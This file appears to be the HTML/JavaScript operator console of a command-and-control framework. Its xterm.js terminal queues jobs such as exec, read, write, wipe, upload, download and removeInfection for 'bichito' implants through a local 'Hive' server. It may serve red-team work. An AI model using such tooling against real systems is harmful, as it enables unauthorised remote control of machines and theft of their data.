<link rel="stylesheet" href="./node_modules/xterm/dist/xterm.css" />
<script src="./node_modules/xterm/dist/xterm.js"></script>
<script src="./static/js/local-echo.js"></script>


    <div id ="terminal" class="row">
    </div>

    <script>
    
    var jids = [];
    // Start an xterm.js instance
		term = new Terminal();
		term.open(document.getElementById('terminal'));

		// Create a local echo controller
		localEcho = new LocalEchoController(term);


    localEcho.read("[bichito]> ")
        .then(input => processCommand(input))
        .catch(error => alert(`Error reading: ${error}`));
  

    //function process command
    function processCommand(input){
      var id = $(".STmain").attr("id");
      var jobEx = input.split(' ')[0].trim();
      var args = input.split(' ').slice(1);
    switch(jobEx) {
      case "help":
        help();
        break;
      case "clear":
        clearConsole();
        break;
      case "respTime":
        sendBjob(id,jobEx,args);
        break;
      case "ttl":
        sendBjob(id,jobEx,args);
        break; 
      case "exec":
        sendBjob(id,jobEx,args);
        break; 
      case "ls":
        sendBjob(id,jobEx,args);
        break; 
      case "accesschk":
        sendBjob(id,jobEx,args);
        break;
      case "read":
        sendBjob(id,jobEx,args);
        break; 
      case "write":
        sendBjob(id,jobEx,args);
        break;
      case "wipe":
        sendBjob(id,jobEx,args);
        break;
      case "upload":
        sendBjob(id,jobEx,args);
        break;
      case "download":
        sendBjob(id,jobEx,args);
        break; 
      case "kill":
        sendBjob(id,jobEx,args);
        break; 
      case "removeInfection":
        sendBjob(id,jobEx,args);
        break;                          
      default:
        help();
        break;

    }

    checkJobsOutput();

    localEcho.read("[bichito]> ")
        .then(input => processCommand(input))
        .catch(error => alert(`Error reading: ${error}`));

    }

//clears the screen
function clearConsole() {
  term.clear();
}

function help(){
  localEcho.println('Help: List of available commands: help,clear,respTime,ttl,exec,ls,accesschk,read,write,wipe,upload,download,kill,removeInfection');
}

//On console input feed check if a job got an sucessful output and print it on JS console

function checkJobsOutput(){

  //Load jobs
  getJobs();

  for (i = 0; i < jobs.length; i++){
    var index = jids.indexOf(jobs[i].jid);
    if ((jobs[i].status == "Success") && (index != -1 )){
      localEcho.println(htmlencode.htmlEncode(jobs[i].result));
      jids.splice(jids.indexOf(index,1));
    }

  }


}


//Serialize and Craft the Bichito-job to send to Hive 
function sendBjob(id,jobT,argums){
    
  //Create Job to send with two elements
  var data = {cid:"",jid:"",pid:"",chid:id,job:jobT,time:"",status:"",result:"",parameters:argums.join(' ')};

  $.ajax({
        type: "POST",
        url: "http://127.0.0.1:8000/job",
        data:  JSON.stringify(data),
        contentType: "application/json; charset=utf-8",
        dataType: "json",
        success: function (response){
          if (response != null){
            localEcho.println("Job with id:"+htmlencode.htmlEncode(response[0].jid)+" sent...");
            jids.push(response[0].jid);
            return
          }
        }

    });

}

    </script>
    </body>
  </html>


